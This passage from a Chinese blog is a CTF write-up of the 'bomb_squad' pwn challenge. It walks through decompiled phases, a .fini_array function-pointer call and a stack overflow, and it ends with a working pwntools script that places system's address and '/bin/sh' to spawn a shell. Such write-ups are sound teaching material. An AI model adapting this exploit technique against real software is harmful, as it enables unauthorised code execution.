class="line">    v1 = v4++;</span><br><span class="line">    result = (<span class="keyword">unsigned</span> __int8)*v1;</span><br><span class="line">    v3 = result;</span><br><span class="line">    <span class="keyword">if</span> ( !(_BYTE)result )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">if</span> ( (<span class="keyword">char</span>)result &lt;= <span class="number">96</span> || (<span class="keyword">char</span>)result &gt; <span class="number">123</span> )</span><br><span class="line">      explode_bomb();</span><br><span class="line">    v0 = v5++;</span><br><span class="line">    <span class="keyword">if</span> ( *v0 != keys[v3 - <span class="number">97</span>] )</span><br><span class="line">      explode_bomb();</span><br><span class="line">    lastentered = v3;</span><br><span class="line">  &#125;</span><br><span class="line">  phase3_solved = <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>接收一串字符串，要求keys里面的字符串要与v5的对应。但实际上不需要这么麻烦，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( !(_BYTE)result )</span><br><span class="line">      <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>
<p>当输入为<code>\x00</code>时，就会跳出循环，直接返回。</p>
<h3 id="phase_4">phase_4</h3>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">phase_4</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  s = (<span class="keyword">char</span> *)get_line();</span><br><span class="line">  <span class="built_in">sscanf</span>(s, <span class="string">"%d %d %d %d %d %d %d"</span>, v5, &amp;v5[<span class="number">1</span>], &amp;v5[<span class="number">2</span>], &amp;v5[<span class="number">3</span>], &amp;v5[<span class="number">4</span>], &amp;v5[<span class="number">5</span>], &amp;v5[<span class="number">6</span>]);</span><br><span class="line">  v2 = &amp;n1;</span><br><span class="line">  result = n1.num;</span><br><span class="line">  v3 = n1.num;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">6</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( v5[i] &lt; <span class="number">0</span> || v5[i] &gt; <span class="number">3</span> )</span><br><span class="line">      explode_bomb();</span><br><span class="line">    v2 = (node *)*((_DWORD *)&amp;v2-&gt;next1 + v5[i]);</span><br><span class="line">    result = v2-&gt;num;</span><br><span class="line">    v3 += result;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( v3 != <span class="number">95</span> )</span><br><span class="line">    explode_bomb();</span><br><span class="line">  phase4_solved = <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里n1是一个结构体，大致结构如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">node</span>&#123;</span></span><br><span class="line">    node* next1;</span><br><span class="line">    node* next2;</span><br><span class="line">    node* next3;</span><br><span class="line">    node* next4;</span><br><span class="line">    <span class="keyword">char</span> name[<span class="number">8</span>];</span><br><span class="line">    <span class="keyword">int</span> num;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>
<p>这一关接收用户输入的数字，根据数字来进行结构体之间num相加的顺序。</p>
<p>比如输入为<code>"0 3"</code>，相加的顺序就是<code>0xa+0x7+0x10</code>。</p>
<p>最后试出来解为<code>3 0 3 0 3 0 0</code>。</p>
<h3 id="secret_phase">secret_phase</h3>
<p>通关之后会进入<code>print_flag</code>，经过<code>verify_working</code>之后会打印出来flag</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">noreturn <span class="title">print_flag</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> ( verify_working() )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Congratulations, you won! Here's the flag:"</span>);</span><br><span class="line">    system(<span class="string">"cat flag.txt"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>但是<code>verify_working</code>始终返回1的，而且最终也并没有得到flag，还是需要getshell。</p>
<p>进入<code>secret_phase</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">secret_phase</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"this is the secret phase.... please whisper, to keep it a seecret..."</span>);</span><br><span class="line">  v2 = &amp;n1;</span><br><span class="line">  v3 = n2;</span><br><span class="line">  v4 = &amp;n3;</span><br><span class="line">  v5 = &amp;n4;</span><br><span class="line">  v6 = &amp;n5;</span><br><span class="line">  v7 = &amp;n6;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">5</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Rename node #%d to: "</span>, i + <span class="number">1</span>);</span><br><span class="line">    fgets((*(&amp;v2 + i))-&gt;name, <span class="number">9</span>, <span class="built_in">stdin</span>);</span><br><span class="line">    *(_BYTE *)strchrnul((*(&amp;v2 + i))-&gt;name, <span class="number">10</span>) = <span class="number">0</span>;</span><br><span class="line">    <span class="built_in">putchar</span>(<span class="number">10</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"Thanks, I was worried about having to come up with clever names myself!"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这一段代码是修改每一个node的name成员，最多只可以溢出一个字节到num上面，并没有什么用。</p>
<h3 id="fini段">fini段</h3>
<blockquote>
<p>该section保存着进程终止代码指令。因此，当一个程序正常退出时，系统安排执行这个section的中的代码。</p>
</blockquote>
<p><code>.fini_array</code>中有一个<code>__gg</code>函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">v5 = &amp;n1;</span><br><span class="line">v6 = n2;</span><br><span class="line">v7 = &amp;n3;</span><br><span class="line">v8 = &amp;n4;</span><br><span class="line">v9 = &amp;n5;</span><br><span class="line">v10 = &amp;n6;</span><br><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">5</span>; ++i )</span><br><span class="line">&#123;</span><br><span class="line">  v0 = alloca(<span class="number">32</span>);</span><br><span class="line">  v1 = *(&amp;v5 + i);</span><br><span class="line">  v2 = (_DWORD *)(<span class="number">16</span> * (((<span class="keyword">unsigned</span> <span class="keyword">int</span>)&amp;v6 + <span class="number">3</span>) &gt;&gt; <span class="number">4</span>));</span><br><span class="line">  *v2 = *v1;</span><br><span class="line">  v2[<span class="number">1</span>] = v1[<span class="number">1</span>];</span><br><span class="line">  v2[<span class="number">2</span>] = v1[<span class="number">2</span>];</span><br><span class="line">  v2[<span class="number">3</span>] = v1[<span class="number">3</span>];</span><br><span class="line">  v2[<span class="number">4</span>] = v1[<span class="number">4</span>];</span><br><span class="line">  v2[<span class="number">5</span>] = v1[<span class="number">5</span>];</span><br><span class="line">  v2[<span class="number">6</span>] = v1[<span class="number">6</span>];</span><br><span class="line">  result = *(_DWORD *)(<span class="number">16</span> * (((<span class="keyword">unsigned</span> <span class="keyword">int</span>)&amp;v6 + <span class="number">3</span>) &gt;&gt; <span class="number">4</span>) + <span class="number">0x14</span>);</span><br><span class="line">  <span class="keyword">if</span> ( result )</span><br><span class="line">    result = (*(<span class="keyword">int</span> (**)(<span class="keyword">void</span>))(<span class="number">16</span> * (((<span class="keyword">unsigned</span> <span class="keyword">int</span>)&amp;v6 + <span class="number">3</span>) &gt;&gt; <span class="number">4</span>) + <span class="number">0x14</span>))();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> result;</span><br></pre></td></tr></table></figure>
<p>经过分析之后发现这个函数会执行每个node中<code>name[4]-name[8]</code>所指向的函数，而name自然可以控制。并且call的时候，此时栈顶指向的就是当前node。那么只需要把某一个node的name后四个字节修改成system，next1指向的内容修改为<code>/bin/sh\x00</code>就可以getshell。</p>
<h3 id="任意地址写">任意地址写</h3>
<p>__nr函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> _nr()</span><br><span class="line">&#123;</span><br><span class="line">  v5 = __readgsdword(<span class="number">0x14</span>u);</span><br><span class="line">  v0 = (<span class="keyword">const</span> <span class="keyword">char</span> *)get_line();</span><br><span class="line">  <span class="built_in">strcpy</span>(&amp;dest, v0);</span><br><span class="line">  v1 = (<span class="keyword">const</span> <span class="keyword">char</span> *)get_line();</span><br><span class="line">  <span class="built_in">strcpy</span>(v4, v1);</span><br><span class="line">  <span class="keyword">return</span> __readgsdword(<span class="number">0x14</span>u) ^ v5;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>很明显的栈溢出，可以通过第一个输入，将v4覆盖为<code>node-&gt;next1</code>的地址，通过第二个输入在修改<code>next1</code>所指向的内容。</p>
<h3 id="payload">payload</h3>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">"./bomb_squad"</span>)</span><br><span class="line">p.sendline(<span class="string">"8584"</span>)</span><br><span class="line">p.sendline(<span class="string">"[1, 1, 3, 5, 11, 21]"</span>)</span><br><span class="line">p.sendline(<span class="string">"\x00"</span>)</span><br><span class="line">p.sendline(<span class="string">"3 0 3 0 3 0 0"</span>)</span><br><span class="line">system = <span class="number">0x080485A0</span></span><br><span class="line">n3 = <span class="number">0x804b0a8</span></span><br><span class="line">nr = <span class="number">0x08048CDA</span></span><br><span class="line">payload = <span class="string">'aaaa'</span> + p32(nr) <span class="comment">#首先利用__gg函数执行node1中的__nr函数</span></span><br><span class="line">p.send(payload)</span><br><span class="line">payload = <span class="string">'bbbb'</span> + p32(system) + <span class="string">"\n\n\n\n"</span> <span class="comment">#接着写入system地址到node2等待第二次call，最后4个\n跳过剩下4个node-&gt;name的修改</span></span><br><span class="line">p.send(payload) </span><br><span class="line">payload = <span class="string">'a'</span> * <span class="number">0xfc</span> + p32(n3) <span class="comment">#栈溢出，修改n3-&gt;next1指向的内容</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.sendline(<span class="string">'/bin/sh\x00'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>之所以为什么是要修改<code>n3-&gt;next1</code>，因为system地址写入到了node2的name中，当<code>__gg</code>函数执行时，此时栈顶排列为</p>
<table>
<thead>
<tr class="header">
<th>n3</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>n4</td>
</tr>
<tr class="even">
<td>n5</td>
</tr>
<tr class="odd">
<td>n6</td>
</tr>
<tr class="even">
<td>name</td>
</tr>
<tr class="odd">
<td>num</td>
</tr>
</tbody>
</table>
<p>接下来就要执行system函数，所以要修改n3指向的地址。</p>

      
    </div>
    
    
    

    

    

    
	
	
	  <div>
	    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
	  </div>
	

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/01/vim/" rel="next" title="关于vim的复制粘贴">
                <i class="fa fa-chevron-left"></i> 关于vim的复制粘贴
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/29/tools/" rel="prev" title="常用CTF工具收集">
                常用CTF工具收集 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="lv-container" data-id="city" data-uid="MTAyMC80NDQ3OC8yMTAxMA=="></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/avatar.PNG" alt="a1oyss">
            
              <p class="site-author-name" itemprop="name">a1oyss</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/a1oyss" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:2697963615@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://osu.ppy.sh/users/11660620" target="_blank" title="osu!">
                      
                        <i class="fa fa-fw fa-circle"></i>osu!</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://space.bilibili.com/8664321" target="_blank" title="bilibili">
                      
                        <i class="fa fa-fw fa-tv"></i>bilibili</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#reverse"><span class="nav-number">1.</span> <span class="nav-text">REVERSE</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#misc"><span class="nav-number">2.</span> <span class="nav-text">MISC</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#mobile"><span class="nav-number">3.</span> <span class="nav-text">MOBILE</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#pwn"><span class="nav-number">4.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#bomb_squad"><span class="nav-number">4.1.</span> <span class="nav-text">bomb_squad</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#phase_1"><span class="nav-number">4.1.1.</span> <span class="nav-text">phase_1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#phase_2"><span class="nav-number">4.1.2.</span> <span class="nav-text">phase_2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#phase_2-1"><span class="nav-number">4.1.3.</span> <span class="nav-text">phase_2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#phase_4"><span class="nav-number">4.1.4.</span> <span class="nav-text">phase_4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#secret_phase"><span class="nav-number">4.1.5.</span> <span class="nav-text">secret_phase</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fini段"><span class="nav-number">4.1.6.</span> <span class="nav-text">fini段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#任意地址写"><span class="nav-number">4.1.7.</span> <span class="nav-text">任意地址写</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#payload"><span class="nav-number">4.1.8.</span> <span class="nav-text">payload</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">a1oyss</span>

  
</div>






  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a></div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
